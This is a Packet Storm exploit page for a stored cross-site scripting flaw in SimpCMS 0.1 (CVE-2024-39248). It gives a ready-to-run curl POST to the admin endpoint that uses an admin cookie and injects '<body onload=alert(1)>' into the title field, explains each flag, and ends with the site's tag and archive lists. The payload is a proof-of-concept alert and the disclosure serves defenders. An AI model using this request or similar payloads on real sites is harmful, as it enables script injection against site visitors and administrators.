SimpCMS 0.1 Cross Site Scripting ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

        # Exploit Title: SimpCMS v0.1 - Cross Site Scripting (XSS)
# Date: 26-06-2024
# CVE: CVE-2024-39248
# Exploit Author: Jason Jacobs (0xjason_jacobs)
# Vendor Homepage: https://sourceforge.net/projects/simpcms/
# Software Link: https://sourceforge.net/projects/simpcms/
# Category: Web Application
# Version: 0.1
# Vulnerable endpoint: /SimpCMS/admin.php
Upon logging in to the admin interface for SimpCMS, copy your respective Cookie values observed in the Application tab in the browser Inspect element and submit the following curl request:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Explanation:
- curl: The command-line tool for transferring data with URLs.
- -X POST: Specifies the request method to use (POST).
- "http://site.com/SimpCMS/admin.php": The URL to which the request is sent.
- -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit": The POST request payload.
Run this command in your terminal to send the POST request with the XSS payload.
Visit the /SimpCMS main site and the XSS will be visible.

• Follow us on Twitter^[16]
• Follow us on Facebook^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (933)
• Advisory^[20] (85,744)
• Arbitrary^[21] (16,774)
• BBS^[22] (2,859)
• Bypass^[23] (1,840)
• CGI^[24] (1,033)
• Code Execution^[25] (7,720)
• Conference^[26] (691)
• Cracker^[27] (844)
• CSRF^[28] (3,377)
• DoS^[29] (24,892)
• Encryption^[30] (2,388)
• Exploit^[31] (52,991)
• File Inclusion^[32] (4,255)
• File Upload^[33] (989)
• Firewall^[34] (822)
• Info Disclosure^[35] (2,874)
• Intrusion Detection^[36] (913)
• Java^[37] (3,134)
• JavaScript^[38] (895)
• Kernel^[39] (7,110)
• Local^[40] (14,743)
• Magazine^[41] (586)
• Overflow^[42] (13,129)
• Perl^[43] (1,434)
• PHP^[44] (5,218)
• Proof of Concept^[45] (2,375)
• Protocol^[46] (3,718)
• Python^[47] (1,625)
• Remote^[48] (31,556)
• Root^[49] (3,621)
• Rootkit^[50] (524)
• Ruby^[51] (629)
• Scanner^[52] (1,656)
• Security Tool^[53] (8,014)
• Shell^[54] (3,270)
• Shellcode^[55] (1,217)
• Sniffer^[56] (901)
• Spoof^[57] (2,267)
• SQL Injection^[58] (16,569)
• TCP^[59] (2,438)
• Trojan^[60] (690)
• UDP^[61] (900)
• Virus^[62] (669)
• Vulnerability^[63] (32,839)
• Web^[64] (9,932)
• Whitepaper^[65] (3,779)
• x86^[66] (967)
• XSS^[67] (18,224)
• Other^[68]

File Archives

• June 2024^[69]
• May 2024^[70]
• April 2024^[71]
• March 2024^[72]
• February 2024^[73]
• January 2024^[74]
• December 2023^[75]
• November 2023^[76]
• October 2023^[77]
• September 2023^[78]
• August 2023^[79]
• July 2023^[80]
• Older^[81]

Systems

• AIX^[82] (429)
• Apple^[83] (2,089)
• BSD^[84] (376)
• CentOS^[85] (58)
• Cisco^[86] (1,927)
• Debian^[87] (7,071)
• Fedora^[88] (1,693)
• FreeBSD^[89] (1,246)
• Gentoo^[90] (4,505)
• HPUX^[91] (880)
• iOS^[92] (376)
• iPhone^[93] (108)
• IRIX^[94] (220)
• Juniper^[95] (69)
• Linux^[96] (50,138)
• Mac OS X^[97] (691)
• Mandriva^[98] (3,105)
• NetBSD^[99] (256)
• OpenBSD^[100] (488)
• RedHat^[101] (16,143)
• Slackware^[102] (941)
• Solaris^[103] (1,611)
• SUSE^[104] (1,444)
• Ubuntu^[105] (9,604)
• UNIX^[106] (9,422)
• UnixWare^[107] (187)
• Windows^[108] (6,665)
• Other^[109]

© 2022 Packet Storm. All rights reserved.